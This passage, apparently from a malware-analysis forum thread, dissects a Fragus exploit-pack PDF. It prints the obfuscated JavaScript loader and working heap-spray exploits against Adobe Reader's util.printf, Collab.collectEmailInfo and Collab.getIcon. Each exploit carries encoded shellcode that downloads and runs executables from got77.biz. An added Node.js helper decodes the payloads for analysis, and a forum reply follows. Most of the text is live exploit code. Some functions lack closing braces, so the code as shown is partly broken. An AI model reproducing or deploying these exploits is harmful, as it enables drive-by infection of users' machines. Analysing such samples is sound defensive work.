138,157,152,140,190,136,169,141,167,137,220,127,141,149,160,139,217,158,125,140,169,127,219,151,158,124,141,136,207,156,150,153,142,123,216,145,167,154,160,110,203,154,138,152,170,140,190,140,154,144,155,137,220,127,138,149,160,139,217,157,138,140,154,127,219,154,172,127,153,136,207,153,151,158,124,123,216,144,155,150,172,110,203,153,143,157,156,140,190,134,147,138,150,134,144,132,204,196,204,134,204,190,186,139,147,138,169,178,164,191,204,211,191,218,204,224,170,132,207,191,212,203,219,177,128,149,149,220,197,217,105,194,200,200,163,148,223,125,134,147,138,150,148,148,113,190,186,203,155,148,151,140,164,142,138,222,151,159,114,145,217,187,216,132,224,170,200,214,202,163,217,213,174,201,198,18
7,214,201,143,107,123,216,147,150,157,151,110,203,156,138,159,148,137,114,145,220,187,216,215,215,134,188,204,210,197,205,219,113,207,196,204,217,212,147,181,187,209,131,161,218,200,187,118,211,143,167,206,178,127,139,201,151,142,148,223,121,185,147,189,150,199,151,172,131,147,210,154,148,151,121,134,147,131,149,148,223,125,134,147,138,150,148,162,175,197,213,130,220,197,217,105,204,212,189,183,168,160,127,207,160,138,161,218,216,172,167,167,147,156,221,163,185,139,164,196,177,154,156,175,145,217,203,201,181,171,130,140,220,133,145,141,226,170,200,213,211,193,218,216,172,167,167,147,156,221,196,134,207,196,204,217,212,146,191,204,211,191,218,204,224,170,145,224,100,220,197,217,105,202,184,167,206,178,201,144,205,160,207,212,201,218,172,183,211,191,142,134,140,121,143,133,131,161,219,207,178,194,200,130,218,185,180,177,164,197,161,221,146,211,174,196,202,206,206,160,151,193,138,147,138,150,141,226,189,171,176,194,180,198,174,192,129,160,206,187,177,207,151,184,170,209,161,225,113,189,171,176,194,180,198,174,192,147,133,168,148,134,146,189,171,176,194,180,198,174,192,145,196,202,214,146,203,184,185,145,157,213,208,211,170,184,145,193,203,216,176,172,197,209,130,218,185,180,177,164,197,161,221,141,162,198,211,109,192,219,210,202,189,191,210,200,134,212,203,175,181,214,206,199,214,219,113,127,222,208,199,214,135,191,187,213,205,207,211,213,134,183,211,202,148,218,208,174,205,200,204,188,201,217,188,191,210,200,148,216,214,156,202,213,195,212,203,143,114,145,217,191,216,215,208,184,196,160,208,203,214,218,178,197,209,136,216,201,215,181,183,198,191,142,147,195,141,133,202,134,141,139,144,132,204,196,204,134,218,200,187,201,204,201,212,195,200,187,200,196,211,163,210,204,192,118,164,204,216,197,224,113,204,200,204,217,205,214,183,132,198,194,199,214,168,189,126,147,131,146,218,204,187,201,204,201,212,146,202,177,183,213,155,218,140,152,114,130,217,191,216,215,208,184,196,145,189,206,197,217,138,202,139,140,143,141,162,178,188,139,130,220,197,217,188,191,210,200,197,197,21
7,187,183,220,181,150,193,164,134,142,140,128,140,140,221,170,200,214,195,213,210,198,170,200,213,187,223,191,152,166,147,160,138,143,224,227,113,204,196,204,217,205,214,183,181,196,204,216,197,224,164,135,192,151,163,149,141,111,204,196,204,217,205,214,183,181,196,204,216,197,224,164,136,192,150,153,141,144,196,203,215,195,210,195,215,187,191,209,206,204,140,144,132,211,109,195,204,140,143,191,183,213,205,207,211,213,168,183,213,204,199,221,194,121,179,159,146,143,224,227,113,204,196,204,217,205,214,183,181,196,204,216,197,224,164,134,192,151,163,156,141,111,204,196,204,217,205,214,183,181,196,204,216,197,224,164,135,192,150,152,138,141,191,183,213,205,207,211,213,168,183,213,204,199,221,194,123,179,159,140,143,141,226,172,197,207,198,199,198,198,174,195,196,195,210,140,144,132,211,109,195,204,140,143,191,183,213,205,207,211,213,168,183,213,204,199,221,194,121,179,159,147,143,224,227,113,204,196,204,217,205,214,183,181,196,204,216,197,224,164,134,192,151,163,157,141,111,204,196,204,217,205,214,183,181,196,204,216,197,224,164,135,192,150,151,141,144,196,185,210,198,210,197,201,168,189,200,206,207,199,214,183,126,140,149,227,225,113,185,186,201,185,217,216,200,187,202,139,131,161];

Second section: FlateDecode

Code:
for (var amnsx=0, fioqtu='';amnsx<5298;amnsx++){fioqtu += String.fromCharCode(fra[amnsx]-'gIVcZfd'.substring(amnsx%'gIVcZfd'.length,amnsx%'gIVcZfd'.length+1).charCodeAt(0));}eval(fioqtu);


output variant:

Code:
function fix_it(yarsp, len)
{
    while (yarsp.length * 2 < len) {
        yarsp += yarsp;
    }
    yarsp = yarsp.substring(0, len / 2);
    return yarsp;
}
function util_printf()
{
    var payload = unescape("%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u746F%u3737%u622E%u7A69%u702F%u6765%u642F%u706D%u7472%u3377%u652E%u6578%u0000");
    var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
    var heapblock = nop + payload;
    // Heap spray: the 0x0A0A filler doubles as sled and as spray address
    // (0x0A0A0A0A), so a hijacked pointer into the sprayed region slides
    // forward into the payload at the end of each block.
    var bigblock = unescape("%u0A0A%u0A0A");
    var headersize = 20;
    var spray = headersize + heapblock.length;
    while (bigblock.length < spray) {
        bigblock += bigblock;
    }
    var fillblock = bigblock.substring(0, spray);
    var block = bigblock.substring(0, bigblock.length - spray);
    // Grow each block to about 0x40000 characters, then allocate 1400 of them;
    // the oversized util.printf() call below is the trigger.
    while (block.length + spray < 0x40000) {
        block = block + block + fillblock;
    }
    var mem_array = new Array();
    for (var i = 0; i < 1400; i++) {
        mem_array[i] = block + heapblock;
    }
    var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
    util.printf("%45000f", num);
}
// Collab.collectEmailInfo() stack overflow (CVE-2007-5659, fixed in Reader 8.1.2).
// Same shellcode family as above; this copy's %u tail decodes to
// hxxp://got77.biz/peg/bcioqxz3.exe, a different file name from the util_printf payload.
function collab_email()
{
    var shellcode = unescape("%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u746F%u3737%u622E%u7A69%u702F%u6765%u622F%u6963%u716F%u7A78%u2E33%u7865%u0065");
    var mem_array = new Array();
    var cc = 0x0c0c0c0c;                   // address the overflow hands control to
    var addr = 0x400000;                   // size of each spray block (4 MiB)
    var sc_len = shellcode.length * 2;
    var len = addr - (sc_len + 0x38);      // sled sized so sled + shellcode fills one block
    var yarsp = unescape("%u9090%u9090");  // x86 NOPs
    yarsp = fix_it(yarsp, len);
    var count2 = (cc - 0x400000) / addr;   // enough 4 MiB blocks to reach 0x0c0c0c0c
    for (var count = 0; count < count2; count++) {
        mem_array[count] = yarsp + shellcode;
    }
    // Trigger: a ~44 KB msg argument made of 0x0c0c0c0c overruns the buffer,
    // so execution lands at 0x0c0c0c0c inside the sprayed sled.
    var overflow = unescape("%u0c0c%u0c0c");
    while (overflow.length < 44952) {
        overflow += overflow;
    }
    this.collabStore = Collab.collectEmailInfo({
        subj : "", msg : overflow
    });
// Collab.getIcon() stack overflow (CVE-2009-0927, fixed in Reader 9.1 / 8.1.4).
// This payload's %u tail decodes to hxxp://got77.biz/peg/dgjlns3.exe.
function collab_geticon()
{
    if (app.doc.Collab.getIcon)
    {
        var arry = new Array();
        var vvpethya = unescape("%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u746F%u3737%u622E%u7A69%u702F%u6765%u642F%u6A67%u6E6C%u3373%u652E%u6578%u0000");
        var hWq500CN = vvpethya.length * 2;
        var len = 0x400000 - (hWq500CN + 0x38);
        var yarsp = unescape("%u9090%u9090");
        yarsp = fix_it(yarsp, len);
        // Same 4 MiB-block NOP-sled spray up to 0x0c0c0c0c as in collab_email()
        var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
        for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y++) {
            arry[vqcQD96y] = yarsp + vvpethya;
        }
        // Trigger: a 16 KiB run of tab characters (0x09) prefixed with "N."
        // overflows the buffer behind getIcon()'s argument.
        var tUMhNbGw = unescape("%09");
        while (tUMhNbGw.length < 0x4000) {
            tUMhNbGw += tUMhNbGw;
        }
        tUMhNbGw = "N." + tUMhNbGw;
        app.doc.Collab.getIcon(tUMhNbGw);
}
// Choose the exploit from the Adobe Reader version: app.viewerVersion is
// stripped to its digits, e.g. "8.1.2" becomes ['8', '1', '2'].
function pdf_start()
{
    var version = app.viewerVersion.toString();
    version = version.replace(/\D/g, '');
    var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
    // Intended: 8.0.x or 8.1.0-8.1.2. As written, && binds tighter than ||,
    // so any major version with minor 1 and patch < 3 also takes this branch.
    if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && varsion_array[2] < 3)) {
        util_printf();
    }
    // Reader 7 and earlier, or 8.0.0/8.0.1/8.1.0/8.1.1
    if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && varsion_array[2] < 2)) {
        collab_email();
    }
    // Reader 8 and earlier, or 9.0.x
    if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)) {
        collab_geticon();
    }
}
pdf_start();


shellcode download & execute file hxxp://got77.biz/peg/dmprtw3.exe
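Added example (not from the post above and not part of the Fragus pack): a small Node.js helper that undoes both encodings seen in this post without running the sample, the subtraction cipher of the loader and the %uXXXX encoding of the shellcode. The post's `fra` array is cut off on the page, so the cipher is exercised on a constructed round-trip with the post's key 'gIVcZfd'; the three `%u` tails are copied from the util_printf, collab_email and collab_geticon strings above. Decoding all three goes beyond the single URL named in the post: each payload carries a different file name under got77.biz/peg/.

```javascript
// Analysis helpers for the Fragus PDF stage (added example, no dependencies).
// 1. decodeSubKey(): inverse of the loader loop, returned instead of eval()'d.
// 2. unicodeEscapesToBytes() + asciiStrings(): read the hardcoded download
//    URL out of a %u-encoded shellcode string, like `strings` would.

// Loader transform: fra[i] - key[i % key.length]. We only return the string.
function decodeSubKey(arr, key) {
  let out = '';
  for (let i = 0; i < arr.length; i++) {
    out += String.fromCharCode(arr[i] - key.charCodeAt(i % key.length));
  }
  return out;
}

// Forward direction, used only to build a constructed test vector because the
// real fra[] array is truncated on the page.
function encodeSubKey(str, key) {
  const out = [];
  for (let i = 0; i < str.length; i++) {
    out.push(str.charCodeAt(i) + key.charCodeAt(i % key.length));
  }
  return out;
}

// "%uXXXX" -> the little-endian bytes unescape() would place in memory:
// low byte first, then high byte.
function unicodeEscapesToBytes(s) {
  const bytes = [];
  const re = /%u([0-9a-fA-F]{4})/g;
  let m;
  while ((m = re.exec(s)) !== null) {
    const v = parseInt(m[1], 16);
    bytes.push(v & 0xff, v >> 8);
  }
  return bytes;
}

// Printable-ASCII runs of at least minLen characters.
function asciiStrings(bytes, minLen = 4) {
  const found = [];
  let cur = '';
  for (const b of bytes) {
    if (b >= 0x20 && b <= 0x7e) {
      cur += String.fromCharCode(b);
    } else {
      if (cur.length >= minLen) found.push(cur);
      cur = '';
    }
  }
  if (cur.length >= minLen) found.push(cur);
  return found;
}

// First http:// string inside a %u-encoded payload, or null.
function downloadUrl(escapedShellcode) {
  const hit = asciiStrings(unicodeEscapesToBytes(escapedShellcode))
    .find(x => x.startsWith('http://'));
  return hit === undefined ? null : hit;
}

// URL-bearing tails of the three payloads, copied from the post's strings.
const TAILS = {
  util_printf:    '%u7468%u7074%u2F3A%u672F%u746F%u3737%u622E%u7A69%u702F%u6765%u642F%u706D%u7472%u3377%u652E%u6578%u0000',
  collab_email:   '%u7468%u7074%u2F3A%u672F%u746F%u3737%u622E%u7A69%u702F%u6765%u622F%u6963%u716F%u7A78%u2E33%u7865%u0065',
  collab_geticon: '%u7468%u7074%u2F3A%u672F%u746F%u3737%u622E%u7A69%u702F%u6765%u642F%u6A67%u6E6C%u3373%u652E%u6578%u0000',
};

function allDownloadUrls() {
  const out = {};
  for (const [name, tail] of Object.entries(TAILS)) out[name] = downloadUrl(tail);
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  const key = 'gIVcZfd';
  const sample = encodeSubKey('app.alert("constructed sample");', key);
  console.log(decodeSubKey(sample, key));
  console.log(allDownloadUrls());
}
```

Run it with `node` to print the round-tripped sample and the three URLs; to process another sample of this family, paste the whole `unescape("...")` argument into `downloadUrl()` rather than just the tail.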
SysAdMini
Administrator
Hero Member
*****
Posts: 1991



« Reply #14 on: September 13, 2009, 07:23:00 am »

Quote from: Malware-Web-Threats
shellcode download & execute file hxxp://got77.biz/peg/dmprtw3.exe

As mentioned earlier in this thread, file names change at each run, so what Anthony has posted is not wrong.

Ruining the bad guy's day